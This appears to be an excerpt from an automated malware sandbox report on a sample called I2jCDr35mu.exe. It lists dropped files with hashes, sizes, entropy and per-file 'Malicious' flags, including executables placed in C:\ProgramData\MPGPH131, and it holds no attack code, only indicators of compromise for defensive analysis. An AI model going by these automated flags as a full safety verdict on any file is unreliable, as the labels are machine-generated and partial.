                                                                                                                                                                                  SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                  MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                  SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                  SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                  SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:topTraffic_170540185939602997400506234197983529371
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                  MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                  SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                  SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                  SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092484193558416
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBXPi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK0zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:7DF0648ECC40DAF8910DFC4C1B1A802D
                                                                                                                                                                                  SHA1:721EC88B3F1D82020C44372D53006492A1712EC1
                                                                                                                                                                                  SHA-256:602D358147209D2097B7B04CBEFDF5184B21A7616D75711B94CF4EF2EFE0A767
                                                                                                                                                                                  SHA-512:A83411A679603AB0A097D0A41B335720363C62644A7DC313D3443A18BBB75E5FA73AE0628BEA57C780218BE4BEBE58BA77C5D5C3CEA9E0C1D35FDB85E366C0EA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):44902
                                                                                                                                                                                  Entropy (8bit):6.095884668343846
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWNmi1zNt2CNoaLFQP9uKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynabKtSmd6qE7lFoC
                                                                                                                                                                                  MD5:63F3469CA792E17C27937C9F6982B83C
                                                                                                                                                                                  SHA1:2F18E896574CBE286F76F2142DF29A2FF08F9C0E
                                                                                                                                                                                  SHA-256:9D9DF2CBC69471290192A3FC50441758B6A7AB75E75504DB533D7F39C3637B82
                                                                                                                                                                                  SHA-512:259AA6D4AD784769334FA03451AE7CFB132D82078CB1A3E3E45032F530A565891F19EFBD7CCE7A43EF5A6125CDA6DFEE8F60A76C228AA6A3CFCDCBB311948B97
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092531414876403
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBLpi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK2zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:434B94B5906F1EA4CEDA5B39356E9A9E
                                                                                                                                                                                  SHA1:CD728C877B8214393997FAF320002EA0641B28B9
                                                                                                                                                                                  SHA-256:30E11A10DADAF1999E8D2D0B5DBD315D6FDCCA7E108BFB8815B5FD2EABA47539
                                                                                                                                                                                  SHA-512:691D56C1B0047CDA0632207357979D1AB7F18E79AF25B6ECD53F156CC3E034EB5CFC7C5D47D7948875831693FCC71B20D78EC98B1938801552A8F19AA76B1721
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.09252785286692
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBCli1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKtzKtSmd6qE7lFov
                                                                                                                                                                                  MD5:8A15BAE0DA243D937D447DEF39BCDD23
                                                                                                                                                                                  SHA1:91CCC9DF269A3BEDFE8FA09A0D1B9F661963C879
                                                                                                                                                                                  SHA-256:C729A5D10D55919F7C7148537766CCDA5FB77C7DB58195627D6664EBD4EF15DE
                                                                                                                                                                                  SHA-512:1B5A578291E8DAEBEE13DCC9DAA6396BE02EEA11AFC6FCEEA41DC345A4553A723C9B0C1FC0480556AC2E122A4DEC4076C6A757C2B03115CBAAE5C53F3D35D794
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092469357830813
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBcRi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK7zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:FFC4990850200D027190B3995A43A017
                                                                                                                                                                                  SHA1:A9C62D678FC9CCD6547156D5AAF96C101FB5E56A
                                                                                                                                                                                  SHA-256:C17CFFBA51CD31DC0845D7CE4C5003E4C0A4778800598AF8046587C7D4E05EBA
                                                                                                                                                                                  SHA-512:05B49FE7017C1A5DEA24AD6F872675951CEC43385E54D31391A04A6B61C1A829AF0752509DFE880B5F445FB41203F4F5304389D135BD99F2D9C1F420AB299983
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.0924167428247715
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKyPJi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKlMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:D4389D2BF8008EC01C8AB7608F5733B4
                                                                                                                                                                                  SHA1:52082178178A6D8585C832FACB7B00288836CF38
                                                                                                                                                                                  SHA-256:2086F69FA5450752260D6A3DA0C8EFB7D2D2A35F4E49A98EFE3CBE09E33E788F
                                                                                                                                                                                  SHA-512:CDDFDD18401F743127A7483B863D4356B37C2CF0DA70113501B4EA514541AF1AF8CDE19C0E424805F59521F9B1860094C2DC4E10C5FAA8515A4127D65B6A1B25
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092410535146648
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy5tbi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47A:3/Ps+wsI7yOKvMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:30DA1C56AA3ED92FC5536B412A6DE4D5
                                                                                                                                                                                  SHA1:9455012306325D937BC6BB5ED7A5A4DB0750B2D1
                                                                                                                                                                                  SHA-256:27836724ED8D0B383ADB0122846EF27146DD5CB9EDC19E059E40610C33A9834C
                                                                                                                                                                                  SHA-512:52C81A60721CE703B35E3F8961D6E9F392FD9B4C4E26DD8A15EA33526AC8AF9EB25CE268DA0EF8816EBD6060B6B61B11E3485A1B05526905F10CFDBB94C35738
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092499967645902
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKyUJi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKkMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:C6B0F0C8D80627BE14FB9E3D99F3C8A4
                                                                                                                                                                                  SHA1:E26481ACBA6A7E16D7B8AC13418FA9E80A6D4E7C
                                                                                                                                                                                  SHA-256:7B3B2C0E88EDABBBE20F0E524531684A1836F7B53C52FA06C33375F38EFCA212
                                                                                                                                                                                  SHA-512:8C0811380E4AD34D2D3052EC9DB46463EABF2350801C1A08EB258224492373D120B912B4B8625E01175782BAA19AE3BDBF80D3560A8F227DB468D50DC0935869
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.0925320218455505
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBUJi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKvzKtSmd6qE7lFov
                                                                                                                                                                                  MD5:DEB15F8A806E63E7037F8F9C50969E92
                                                                                                                                                                                  SHA1:683AD72019ECBF769201AA06EC3C79BE3A2D2276
                                                                                                                                                                                  SHA-256:0A44F02A73713EECC3C1ECBC6F395F0D3C590E345281A9542F7C3A41C3B0B669
                                                                                                                                                                                  SHA-512:2C485FD8002839DE7652B0F6D977F09D07A9B5DB07F5938ED86381E251ACEDD302919613177EBEC2D4EE69520CB992139CF314F14C8925F6B620FEC8F8E32FF4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                  Entropy (8bit):3.8476098086728587
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxqxl9Il8uUNPfMO5Kt/3ZXTrBIgd1rc:mDYy9fMpxT2
                                                                                                                                                                                  MD5:1C2134961AEB99E6F1508E6E75670ED0
                                                                                                                                                                                  SHA1:48B6926D205FC7464559B37F8CE286DA34917240
                                                                                                                                                                                  SHA-256:93CDA3FB39DCB13B07CA0B336060FD184D393594716C26BB2678AD9EA2DE975A
                                                                                                                                                                                  SHA-512:53D2C806CCE8517DD29B4C71760BC55BA5C45B36D4E800AD0FE6CE1BD0094910D3B5B793F07B083724071FD8AB5E9FA9466CB3F5D1CE3999487160416CCE2D80
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                  Entropy (8bit):4.001319918252243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:GYyQ/4JSugjqPZ6bkAvjJeJ/IfsiWAEol5IGW41icC:GX9JtaqYbHkIEzAfIGWgicC
                                                                                                                                                                                  MD5:C563AA1A1F7205FF444B97F0EB6D532D
                                                                                                                                                                                  SHA1:909DF2421DD53EFF55AFE30D86FAFB10857B423A
                                                                                                                                                                                  SHA-256:84A0A6DB82B6F19878BECCF3B054BBABBA6B909C5119F7AB86DE0128C00F0CAC
                                                                                                                                                                                  SHA-512:F1B0796BFF009E63A1A63D0A1A6CF15DFBBA05C814B674BC1A29D95C058F70CAC3755994E947ED04243C9A18159797AF1D7CFFC2106DC1F0DEEDDBA415DA16D6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):739328
                                                                                                                                                                                  Entropy (8bit):7.979896185184989
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:IINqBfLfGjui+14ljDuNbRdjc3dEEwq4FDLk2ldHU3nhR1JPHVQPInKIkTMZ+kur:I0Beb/c3d5wqsk2vQnnzKITZlucg
                                                                                                                                                                                  MD5:28EF40F53C38FDF1211F174563BB532C
                                                                                                                                                                                  SHA1:123AABE3254B8BB0EEDBEB03AB5C89F461B120EB
                                                                                                                                                                                  SHA-256:008870E652BE38FC6EC9D8DDE344BB9B70E3409879E02E1E09397D8060D859AE
                                                                                                                                                                                  SHA-512:EF64FA7DE06D5C2242D7B164A49282B34104D05C0828CCF228E598E1886E5A19FEF5D637F480BB58E8CCEB35CF28A26AF008CE7C543E3F4C5EF705C8C68F709D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2399744
                                                                                                                                                                                  Entropy (8bit):7.962349167063599
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:nBeLY5wqsk2vUnzPT7uc1eb0MmZEazB2XP3Oxc1tHTf:wIt0vcrT7ucAvm90fG
                                                                                                                                                                                  MD5:0EC84D886E773CBA442A61606DF14F06
                                                                                                                                                                                  SHA1:404EFBEAE6B921DCFC1FBE5B90EE47E5FB7B8038
                                                                                                                                                                                  SHA-256:B29798AA1B8E46207A37CCD73613B87BC8F2A6D50774D0079CF7AB341B1EBB3D
                                                                                                                                                                                  SHA-512:5C026CDC1752F026D37AF3619E78565EDC8896DA35D65B373042D200A7C95003518B01D825B5101CD013F7F142505B5F1328D177202C3F76489C1BF787238A52
